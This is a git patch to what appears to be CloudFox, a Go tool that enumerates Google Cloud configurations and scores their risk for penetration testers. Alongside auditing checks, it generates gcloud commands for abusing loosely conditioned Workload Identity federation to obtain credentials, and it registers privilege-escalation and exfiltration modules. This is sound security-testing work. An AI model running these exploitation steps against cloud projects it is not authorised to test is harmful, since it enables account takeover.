perimeter.HasEgressRules { + reasons = append(reasons, fmt.Sprintf("Has %d egress policies (review for data exfiltration risk)", perimeter.EgressPolicyCount)) + score += 1 + } + + // No resources protected + if len(perimeter.Resources) == 0 { + reasons = append(reasons, "No resources are protected by perimeter") + score += 2 + } + + // Bridge perimeter (less restrictive by design) + if perimeter.PerimeterType == "PERIMETER_TYPE_BRIDGE" { + reasons = append(reasons, "Bridge perimeter - allows cross-perimeter access") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *VPCSCService) analyzeAccessLevelRisk(level AccessLevelInfo) (string, []string) { + var reasons []string + score := 0 + + // Check for overly broad IP ranges + for _, ip := range level.IPSubnetworks { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Access level allows all IP addresses") + score += 3 + break + } + } + + // No IP restrictions + if len(level.IPSubnetworks) == 0 && len(level.Regions) == 0 && len(level.Members) == 0 { + reasons = append(reasons, "Access level has no restrictions defined") + score += 2 + } + + // allUsers or allAuthenticatedUsers + for _, member := range level.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + reasons = append(reasons, fmt.Sprintf("Access level includes %s", member)) + score += 3 + } + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractPerimeterName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/workloadIdentityService/workloadIdentityService.go b/gcp/services/workloadIdentityService/workloadIdentityService.go new file mode 100644 index 00000000..76a01fa4 --- /dev/null +++ b/gcp/services/workloadIdentityService/workloadIdentityService.go @@ -0,0 +1,383 @@ +package workloadidentityservice + +import ( + "context" + "fmt" + "strings" + + iam "google.golang.org/api/iam/v1" +) + +type WorkloadIdentityService struct{} + +func New() *WorkloadIdentityService { + return &WorkloadIdentityService{} +} + +// WorkloadIdentityPool represents a Workload Identity Pool +type WorkloadIdentityPool struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + State string `json:"state"` + Disabled bool `json:"disabled"` + PoolID string `json:"poolId"` +} + +// WorkloadIdentityProvider represents a Workload Identity Pool Provider +type WorkloadIdentityProvider struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + ProjectID string `json:"projectId"` + ProviderType string `json:"providerType"` // aws, oidc, saml + Disabled bool `json:"disabled"` + AttributeMapping map[string]string `json:"attributeMapping"` + AttributeCondition string `json:"attributeCondition"` // CEL expression + // AWS specific + AWSAccountID string `json:"awsAccountId"` + // OIDC specific + OIDCIssuerURI string `json:"oidcIssuerUri"` + AllowedAudiences []string `json:"allowedAudiences"` + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` +} + +// FederatedIdentityBinding represents a binding from federated identity to GCP SA +type FederatedIdentityBinding struct { + ProjectID string `json:"projectId"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + GCPServiceAccount string `json:"gcpServiceAccount"` + ExternalSubject string `json:"externalSubject"` + AttributeCondition string `json:"attributeCondition"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListWorkloadIdentityPools lists all Workload Identity Pools in a project +func (s *WorkloadIdentityService) ListWorkloadIdentityPools(projectID string) ([]WorkloadIdentityPool, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + var pools []WorkloadIdentityPool + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolsResponse) error { + for _, pool := range page.WorkloadIdentityPools { + // Extract pool ID from name + // Format: projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID + poolID := extractLastPart(pool.Name) + + pools = append(pools, WorkloadIdentityPool{ + Name: pool.Name, + DisplayName: pool.DisplayName, + Description: pool.Description, + ProjectID: projectID, + State: pool.State, + Disabled: pool.Disabled, + PoolID: poolID, + }) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list workload identity pools: %v", err) + } + + return pools, nil +} + +// ListWorkloadIdentityProviders lists all providers in a pool +func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolID string) ([]WorkloadIdentityProvider, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + var providers []WorkloadIdentityProvider + parent := fmt.Sprintf("projects/%s/locations/global/workloadIdentityPools/%s", projectID, poolID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.Providers.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolProvidersResponse) error { + for _, provider := range page.WorkloadIdentityPoolProviders { + // Extract provider ID from name + providerID := extractLastPart(provider.Name) + + wip := WorkloadIdentityProvider{ + Name: provider.Name, + DisplayName: provider.DisplayName, + Description: provider.Description, + PoolID: poolID, + ProviderID: providerID, + ProjectID: projectID, + Disabled: provider.Disabled, + AttributeMapping: provider.AttributeMapping, + AttributeCondition: provider.AttributeCondition, + RiskReasons: []string{}, + } + + // Determine provider type and extract specific config + if provider.Aws != nil { + wip.ProviderType = "AWS" + wip.AWSAccountID = provider.Aws.AccountId + } else if provider.Oidc != nil { + wip.ProviderType = "OIDC" + wip.OIDCIssuerURI = provider.Oidc.IssuerUri + wip.AllowedAudiences = provider.Oidc.AllowedAudiences + } else if provider.Saml != nil { + wip.ProviderType = "SAML" + } + + // Perform security analysis + wip.RiskLevel, wip.RiskReasons = s.analyzeProviderRisk(wip) + wip.ExploitCommands = s.generateProviderExploitCommands(wip, projectID) + + providers = append(providers, wip) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list workload identity providers: %v", err) + } + + return providers, nil +} + +// FindFederatedIdentityBindings finds all service accounts with federated identity bindings +func (s *WorkloadIdentityService) FindFederatedIdentityBindings(projectID string, pools []WorkloadIdentityPool) ([]FederatedIdentityBinding, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + var bindings []FederatedIdentityBinding + + // List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + saReq := iamService.Projects.ServiceAccounts.List(parent) + err = saReq.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + // Get IAM policy for this service account + policyReq := iamService.Projects.ServiceAccounts.GetIamPolicy(sa.Name) + policy, pErr := policyReq.Do() + if pErr != nil { + continue + } + + // Look for federated identity bindings + for _, binding := range policy.Bindings { + if binding.Role == "roles/iam.workloadIdentityUser" { + for _, member := range binding.Members { + // Check if this is a federated identity + // Format: principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // Or: principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + if strings.HasPrefix(member, "principal://") || strings.HasPrefix(member, "principalSet://") { + fib := s.parseFederatedIdentityBinding(member, sa.Email, projectID) + if fib != nil { + bindings = append(bindings, *fib) + } + } + } + } + } + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to find federated identity bindings: %v", err) + } + + return bindings, nil +} + +// parseFederatedIdentityBinding parses a federated identity member string +func (s *WorkloadIdentityService) parseFederatedIdentityBinding(member, gcpSA, projectID string) *FederatedIdentityBinding { + // principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + + fib := &FederatedIdentityBinding{ + ProjectID: projectID, + GCPServiceAccount: gcpSA, + ExternalSubject: member, + RiskReasons: []string{}, + } + + // Extract pool ID + if idx := strings.Index(member, "workloadIdentityPools/"); idx != -1 { + rest := member[idx+len("workloadIdentityPools/"):] + if slashIdx := strings.Index(rest, "/"); slashIdx != -1 { + fib.PoolID = rest[:slashIdx] + } + } + + // Analyze risk + score := 0 + + // principalSet is broader than principal + if strings.HasPrefix(member, "principalSet://") { + fib.RiskReasons = append(fib.RiskReasons, + "Uses principalSet (grants access to multiple external identities)") + score += 2 + } + + // Check for wildcards + if strings.Contains(member, "*") { + fib.RiskReasons = append(fib.RiskReasons, + "Contains wildcard in subject/attribute matching") + score += 3 + } + + // Check for common risky patterns + if strings.Contains(member, "attribute.repository") { + fib.RiskReasons = append(fib.RiskReasons, + "Matches on repository attribute (GitHub Actions likely)") + } + + if score >= 3 { + fib.RiskLevel = "HIGH" + } else if score >= 2 { + fib.RiskLevel = "MEDIUM" + } else if score >= 1 { + fib.RiskLevel = "LOW" + } else { + fib.RiskLevel = "INFO" + } + + return fib +} + +// analyzeProviderRisk analyzes the security risk of a provider configuration +func (s *WorkloadIdentityService) analyzeProviderRisk(provider WorkloadIdentityProvider) (string, []string) { + var reasons []string + score := 0 + + // No attribute condition means any authenticated identity from provider can federate + if provider.AttributeCondition == "" { + reasons = append(reasons, + "No attribute condition set - any identity from provider can authenticate") + score += 3 + } + + // AWS provider risks + if provider.ProviderType == "AWS" { + reasons = append(reasons, + fmt.Sprintf("AWS federation enabled from account: %s", provider.AWSAccountID)) + score += 1 + } + + // OIDC provider risks + if provider.ProviderType == "OIDC" { + // Check for common public OIDC providers + knownProviders := map[string]string{ + "token.actions.githubusercontent.com": "GitHub Actions", + "gitlab.com": "GitLab CI", + "accounts.google.com": "Google", + "sts.windows.net": "Azure AD", + "cognito-identity.amazonaws.com": "AWS Cognito", + } + + for pattern, name := range knownProviders { + if strings.Contains(provider.OIDCIssuerURI, pattern) { + reasons = append(reasons, + fmt.Sprintf("OIDC provider: %s (%s)", name, provider.OIDCIssuerURI)) + if name == "GitHub Actions" && provider.AttributeCondition == "" { + reasons = append(reasons, + "CRITICAL: GitHub Actions without attribute condition - any public repo can authenticate!") + score += 4 + } + } + } + } + + // Check attribute mapping for risky patterns + if mapping, ok := provider.AttributeMapping["google.subject"]; ok { + if mapping == "assertion.sub" { + reasons = append(reasons, + "Subject mapped directly from assertion.sub") + } + } + + if score >= 4 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// generateProviderExploitCommands generates exploitation commands for a provider +func (s *WorkloadIdentityService) generateProviderExploitCommands(provider WorkloadIdentityProvider, projectID string) []string { + var commands []string + + commands = append(commands, + fmt.Sprintf("# Workload Identity Provider: %s/%s", provider.PoolID, provider.ProviderID)) + + switch provider.ProviderType { + case "AWS": + commands = append(commands, + fmt.Sprintf("# From AWS account %s, use STS to federate:", provider.AWSAccountID), + fmt.Sprintf("# 1. Get AWS credentials for a role in account %s", provider.AWSAccountID), + "# 2. Exchange for GCP access token:", + fmt.Sprintf("gcloud iam workload-identity-pools create-cred-config \\"), + fmt.Sprintf(" projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\", + projectID, provider.PoolID, provider.ProviderID), + " --aws --output-file=gcp-creds.json", + ) + + case "OIDC": + if strings.Contains(provider.OIDCIssuerURI, "github") { + commands = append(commands, + "# From GitHub Actions workflow, add:", + "permissions:", + " id-token: write", + " contents: read", + "", + "# Then use:", + fmt.Sprintf("gcloud iam workload-identity-pools create-cred-config \\"), + fmt.Sprintf(" projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\", + projectID, provider.PoolID, provider.ProviderID), + " --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\", + " --output-file=gcp-creds.json", + ) + } else { + commands = append(commands, + fmt.Sprintf("# OIDC issuer: %s", provider.OIDCIssuerURI), + "# Get an OIDC token from the issuer, then exchange:", + fmt.Sprintf("gcloud iam workload-identity-pools create-cred-config \\"), + fmt.Sprintf(" projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\", + projectID, provider.PoolID, provider.ProviderID), + " --output-file=gcp-creds.json", + ) + } + } + + return commands +} + +// extractLastPart extracts the last part of a resource name +func extractLastPart(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} diff --git a/globals/gcp.go b/globals/gcp.go index 153eec5f..4d6ab054 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -10,7 +10,7 @@ const GCP_PERMISSIONS_MODULE_NAME string = "permissions" const GCP_SECRETS_MODULE_NAME string = "secrets" const GCP_WHOAMI_MODULE_NAME string = "whoami" -// New module names for future implementation +// New module names const GCP_FUNCTIONS_MODULE_NAME string = "functions" const GCP_CLOUDRUN_MODULE_NAME string = "cloudrun" const GCP_CLOUDSQL_MODULE_NAME string = "cloudsql" @@ -21,6 +21,45 @@ const GCP_SERVICEACCOUNTS_MODULE_NAME string = "serviceaccounts" const GCP_LOGGING_MODULE_NAME string = "logging" const GCP_NETWORKS_MODULE_NAME string = "networks" const GCP_FIREWALL_MODULE_NAME string = "firewall" +const GCP_DNS_MODULE_NAME string = "dns" +const GCP_SCHEDULER_MODULE_NAME string = "scheduler" +const GCP_ORGANIZATIONS_MODULE_NAME string = "organizations" +const GCP_APIKEYS_MODULE_NAME string = "apikeys" +const GCP_ENDPOINTS_MODULE_NAME string = "endpoints" +const GCP_CLOUDBUILD_MODULE_NAME string = "cloudbuild" +const GCP_DATAFLOW_MODULE_NAME string = "dataflow" +const GCP_COMPOSER_MODULE_NAME string = "composer" +const GCP_MEMORYSTORE_MODULE_NAME string = "memorystore" +const GCP_FILESTORE_MODULE_NAME string = "filestore" +const GCP_SPANNER_MODULE_NAME string = "spanner" +const GCP_BIGTABLE_MODULE_NAME string = "bigtable" +const GCP_VPCSC_MODULE_NAME string = "vpc-sc" +const GCP_WORKLOAD_IDENTITY_MODULE_NAME string = "workload-identity" +const GCP_ASSET_INVENTORY_MODULE_NAME string = "asset-inventory" +const GCP_LOADBALANCERS_MODULE_NAME string = "loadbalancers" +const GCP_VPCNETWORKS_MODULE_NAME string = "vpc-networks" +const GCP_NOTEBOOKS_MODULE_NAME string = "notebooks" +const GCP_DATAPROC_MODULE_NAME string = "dataproc" +const GCP_IAP_MODULE_NAME string = "iap" +const GCP_BEYONDCORP_MODULE_NAME string = "beyondcorp" +const GCP_ACCESSLEVELS_MODULE_NAME string = "access-levels" + +// Pentest modules +const GCP_HMACKEYS_MODULE_NAME string = "hmac-keys" +const GCP_PRIVESC_MODULE_NAME string = "privesc" +const GCP_ORGPOLICIES_MODULE_NAME string = "org-policies" +const GCP_BUCKETENUM_MODULE_NAME string = "bucket-enum" +const GCP_CROSSPROJECT_MODULE_NAME string = "cross-project" +const GCP_CUSTOMROLES_MODULE_NAME string = "custom-roles" +const GCP_PUBLICRESOURCES_MODULE_NAME string = "public-resources" +const GCP_SOURCEREPOS_MODULE_NAME string = "source-repos" +const GCP_LOGGINGGAPS_MODULE_NAME string = "logging-gaps" +const GCP_SSHOSLOGIN_MODULE_NAME string = "ssh-oslogin" +const GCP_SERVICEAGENTS_MODULE_NAME string = "service-agents" +const GCP_DOMAINWIDEDELEGATION_MODULE_NAME string = "domain-wide-delegation" +const GCP_NETWORKENDPOINTS_MODULE_NAME string = "network-endpoints" +const GCP_CLOUDARMOR_MODULE_NAME string = "cloud-armor" +const GCP_CERTMANAGER_MODULE_NAME string = "cert-manager" // Verbosity levels (matching Azure pattern) var GCP_VERBOSITY int = 0 diff --git a/go.mod b/go.mod index 7e1bec1b..a47b1689 100644 --- a/go.mod +++ b/go.mod @@ -87,9 +87,12 @@ require ( require ( cel.dev/expr v0.25.1 // indirect + cloud.google.com/go/accesscontextmanager v1.9.7 // indirect cloud.google.com/go/auth v0.17.0 // indirect cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect cloud.google.com/go/monitoring v1.24.3 // indirect + cloud.google.com/go/orgpolicy v1.15.1 // indirect + cloud.google.com/go/osconfig v1.15.1 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.54.0 // indirect @@ -137,6 +140,8 @@ require ( ) require ( + cloud.google.com/go/asset v1.22.0 + cloud.google.com/go/logging v1.13.1 github.com/aws/aws-sdk-go-v2/service/kms v1.49.4 golang.org/x/oauth2 v0.34.0 google.golang.org/api v0.257.0 diff --git a/go.sum b/go.sum index 6f23c6f7..3d0210ae 100644 --- a/go.sum +++ b/go.sum @@ -2,8 +2,12 @@ cel.dev/expr v0.25.1 h1:1KrZg61W6TWSxuNZ37Xy49ps13NUovb66QLprthtwi4= cel.dev/expr v0.25.1/go.mod h1:hrXvqGP6G6gyx8UAHSHJ5RGk//1Oj5nXQ2NI02Nrsg4= cloud.google.com/go v0.123.0 h1:2NAUJwPR47q+E35uaJeYoNhuNEM9kM8SjgRgdeOJUSE= cloud.google.com/go v0.123.0/go.mod h1:xBoMV08QcqUGuPW65Qfm1o9Y4zKZBpGS+7bImXLTAZU= +cloud.google.com/go/accesscontextmanager v1.9.7 h1:aKIfg7Jyc73pe8bzx0zypNdS5gfFdSvFvB8YNA9k2kA= +cloud.google.com/go/accesscontextmanager v1.9.7/go.mod h1:i6e0nd5CPcrh7+YwGq4bKvju5YB9sgoAip+mXU73aMM= cloud.google.com/go/artifactregistry v1.18.0 h1:4qQIM1a1OymPxCODgLpXJo+097feE0i9pwpof98SimQ= cloud.google.com/go/artifactregistry v1.18.0/go.mod h1:UEAPCgHDFC1q+A8nnVxXHPEy9KCVOeavFBF1fEChQvU= +cloud.google.com/go/asset v1.22.0 h1:81Ru5hjHfiGtk+u/Ix69eaWieKpvm7Ce7UHtcZhOLbk= +cloud.google.com/go/asset v1.22.0/go.mod h1:q80JP2TeWWzMCazYnrAfDf36aQKf1QiKzzpNLflJwf8= cloud.google.com/go/auth v0.17.0 h1:74yCm7hCj2rUyyAocqnFzsAYXgJhrG26XCFimrc/Kz4= cloud.google.com/go/auth v0.17.0/go.mod h1:6wv/t5/6rOPAX4fJiRjKkJCvswLwdet7G8+UGXt7nCQ= cloud.google.com/go/auth/oauth2adapt v0.2.8 h1:keo8NaayQZ6wimpNSmW5OPc283g65QNIiLpZnkHRbnc= @@ -22,6 +26,10 @@ cloud.google.com/go/longrunning v0.7.0 h1:FV0+SYF1RIj59gyoWDRi45GiYUMM3K1qO51qob cloud.google.com/go/longrunning v0.7.0/go.mod h1:ySn2yXmjbK9Ba0zsQqunhDkYi0+9rlXIwnoAf+h+TPY= cloud.google.com/go/monitoring v1.24.3 h1:dde+gMNc0UhPZD1Azu6at2e79bfdztVDS5lvhOdsgaE= cloud.google.com/go/monitoring v1.24.3/go.mod h1:nYP6W0tm3N9H/bOw8am7t62YTzZY+zUeQ+Bi6+2eonI= +cloud.google.com/go/orgpolicy v1.15.1 h1:0hq12wxNwcfUMojr5j3EjWECSInIuyYDhkAWXTomRhc= +cloud.google.com/go/orgpolicy v1.15.1/go.mod h1:bpvi9YIyU7wCW9WiXL/ZKT7pd2Ovegyr2xENIeRX5q0= +cloud.google.com/go/osconfig v1.15.1 h1:QQzK5njfsfO2rdOWYVDyLQktqSq9gKf2ohRYeKUuA10= +cloud.google.com/go/osconfig v1.15.1/go.mod h1:NegylQQl0+5m+I+4Ey/g3HGeQxKkncQ1q+Il4DZ8PME= cloud.google.com/go/resourcemanager v1.10.7 h1:oPZKIdjyVTuag+D4HF7HO0mnSqcqgjcuA18xblwA0V0= cloud.google.com/go/resourcemanager v1.10.7/go.mod h1:rScGkr6j2eFwxAjctvOP/8sqnEpDbQ9r5CKwKfomqjs= cloud.google.com/go/secretmanager v1.16.0 h1:19QT7ZsLJ8FSP1k+4esQvuCD7npMJml6hYzilxVyT+k= From abf1543b3e65db0bc3ab47ef0d9b41413725b779 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 30 Dec 2025 09:38:32 -0500 Subject: [PATCH 03/48] added new modules --- gcp/commands/appengine.go | 793 +++++++ gcp/commands/artifact-registry.go | 101 + gcp/commands/backupinventory.go | 884 ++++++++ gcp/commands/bigquery.go | 119 ++ gcp/commands/buckets.go | 221 +- gcp/commands/cloudsql.go | 283 ++- gcp/commands/compliancedashboard.go | 1815 +++++++++++++++++ gcp/commands/containersecurity.go | 813 ++++++++ gcp/commands/costsecurity.go | 994 +++++++++ gcp/commands/crossproject.go | 146 ++ gcp/commands/dataexfiltration.go | 650 ++++++ gcp/commands/firewall.go | 147 ++ gcp/commands/functions.go | 131 ++ gcp/commands/gke.go | 217 +- gcp/commands/identityprotection.go | 926 +++++++++ gcp/commands/instances.go | 195 ++ gcp/commands/lateralmovement.go | 599 ++++++ gcp/commands/logging.go | 179 ++ gcp/commands/memorystore.go | 193 ++ gcp/commands/monitoringalerts.go | 912 +++++++++ gcp/commands/networkexposure.go | 757 +++++++ gcp/commands/networktopology.go | 953 +++++++++ gcp/commands/pubsub.go | 261 +++ gcp/commands/resourcegraph.go | 731 +++++++ gcp/commands/secrets.go | 216 ++ gcp/commands/securitycenter.go | 708 +++++++ gcp/commands/whoami-enhanced.go | 722 +++++++ .../cloudStorageService.go | 99 + .../functionsService/functionsService.go | 69 + gcp/services/gkeService/gkeService.go | 48 + globals/gcp.go | 13 + go.mod | 3 +- go.sum | 2 + 33 files changed, 14882 insertions(+), 18 deletions(-) create mode 100644 gcp/commands/appengine.go create mode 100644 gcp/commands/backupinventory.go create mode 100644 gcp/commands/compliancedashboard.go create mode 100644 gcp/commands/containersecurity.go create mode 100644 gcp/commands/costsecurity.go create mode 100644 gcp/commands/dataexfiltration.go create mode 100644 gcp/commands/identityprotection.go create mode 100644 gcp/commands/lateralmovement.go create mode 100644 gcp/commands/monitoringalerts.go create mode 100644 gcp/commands/networkexposure.go create mode 100644 gcp/commands/networktopology.go create mode 100644 gcp/commands/resourcegraph.go create mode 100644 gcp/commands/securitycenter.go create mode 100644 gcp/commands/whoami-enhanced.go diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go new file mode 100644 index 00000000..74cc6ffd --- /dev/null +++ b/gcp/commands/appengine.go @@ -0,0 +1,793 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/appengine/v1" +) + +// Module name constant +const GCP_APPENGINE_MODULE_NAME string = "app-engine" + +var GCPAppEngineCommand = &cobra.Command{ + Use: GCP_APPENGINE_MODULE_NAME, + Aliases: []string{"appengine", "gae"}, + Short: "Enumerate App Engine applications and security configurations", + Long: `Analyze App Engine applications for security configurations and potential issues. + +Features: +- Lists all App Engine services and versions +- Identifies public services without authentication +- Analyzes ingress settings and firewall rules +- Detects environment variable secrets +- Reviews service account configurations +- Identifies deprecated runtimes +- Analyzes traffic splitting configurations + +Security Checks: +- Public endpoints without IAP/authentication +- Secrets in environment variables +- Deprecated/vulnerable runtimes +- Over-permissioned service accounts +- Missing firewall rules + +Requires appropriate IAM permissions: +- roles/appengine.appViewer +- roles/appengine.serviceAdmin`, + Run: runGCPAppEngineCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AppEngineApp struct { + ID string + ProjectID string + LocationID string + AuthDomain string + DefaultHostname string + ServingStatus string + DefaultBucket string + ServiceAccount string + DispatchRules int + FirewallRules int +} + +type AppEngineService struct { + ID string + AppID string + ProjectID string + Split map[string]float64 // version -> traffic allocation + DefaultURL string + VersionCount int + LatestVersion string +} + +type AppEngineVersion struct { + ID string + ServiceID string + AppID string + ProjectID string + Runtime string + Environment string // standard, flexible + ServingStatus string + CreateTime string + InstanceClass string + Scaling string + Network string + VPCConnector string + IngressSettings string + EnvVarCount int + SecretEnvVars int + ServiceAccount string + BasicScaling string + AutomaticScaling string + ManualScaling string + URL string + RiskLevel string + DeprecatedRuntime bool +} + +type AppEngineFirewallRule struct { + Priority int64 + Action string // ALLOW, DENY + SourceRange string + Description string + ProjectID string +} + +type AppEngineSecurityIssue struct { + ServiceID string + VersionID string + ProjectID string + IssueType string + Severity string + Description string + Remediation string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type AppEngineModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Apps []AppEngineApp + Services []AppEngineService + Versions []AppEngineVersion + FirewallRules []AppEngineFirewallRule + SecurityIssues []AppEngineSecurityIssue + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking + totalApps int + totalServices int + publicCount int + secretsFound int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type AppEngineOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AppEngineOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AppEngineOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_APPENGINE_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &AppEngineModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Apps: []AppEngineApp{}, + Services: []AppEngineService{}, + Versions: []AppEngineVersion{}, + FirewallRules: []AppEngineFirewallRule{}, + SecurityIssues: []AppEngineSecurityIssue{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating App Engine applications and security configurations...", GCP_APPENGINE_MODULE_NAME) + + // Create App Engine client + aeService, err := appengine.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create App Engine service: %v", err), GCP_APPENGINE_MODULE_NAME) + return + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, aeService, logger) + }(projectID) + } + wg.Wait() + + // Check results + if m.totalApps == 0 { + logger.InfoM("No App Engine applications found", GCP_APPENGINE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d App Engine app(s) with %d service(s) and %d version(s)", + m.totalApps, m.totalServices, len(m.Versions)), GCP_APPENGINE_MODULE_NAME) + + if m.publicCount > 0 { + logger.InfoM(fmt.Sprintf("[HIGH] Found %d public service(s) without authentication", m.publicCount), GCP_APPENGINE_MODULE_NAME) + } + + if m.secretsFound > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] Found %d potential secret(s) in environment variables", m.secretsFound), GCP_APPENGINE_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *AppEngineModule) processProject(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating App Engine for project: %s", projectID), GCP_APPENGINE_MODULE_NAME) + } + + // Get App Engine application + app, err := aeService.Apps.Get(projectID).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + // App Engine not enabled is common, don't show as error + if !strings.Contains(err.Error(), "404") { + logger.ErrorM(fmt.Sprintf("Error getting App Engine app for project %s: %v", projectID, err), GCP_APPENGINE_MODULE_NAME) + } + } + return + } + + m.mu.Lock() + m.totalApps++ + m.mu.Unlock() + + // Create app record + appRecord := AppEngineApp{ + ID: app.Id, + ProjectID: projectID, + LocationID: app.LocationId, + AuthDomain: app.AuthDomain, + DefaultHostname: app.DefaultHostname, + ServingStatus: app.ServingStatus, + DefaultBucket: app.DefaultBucket, + ServiceAccount: app.ServiceAccount, + } + + if app.DispatchRules != nil { + appRecord.DispatchRules = len(app.DispatchRules) + } + + m.mu.Lock() + m.Apps = append(m.Apps, appRecord) + m.mu.Unlock() + + // Get services + m.enumerateServices(ctx, projectID, aeService, logger) + + // Get firewall rules + m.enumerateFirewallRules(ctx, projectID, aeService, logger) +} + +func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + services, err := aeService.Apps.Services.List(projectID).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing App Engine services for project %s: %v", projectID, err), GCP_APPENGINE_MODULE_NAME) + } + return + } + + for _, svc := range services.Services { + m.mu.Lock() + m.totalServices++ + m.mu.Unlock() + + serviceRecord := AppEngineService{ + ID: svc.Id, + AppID: projectID, + ProjectID: projectID, + } + + // Parse traffic split + if svc.Split != nil { + serviceRecord.Split = svc.Split.Allocations + } + + 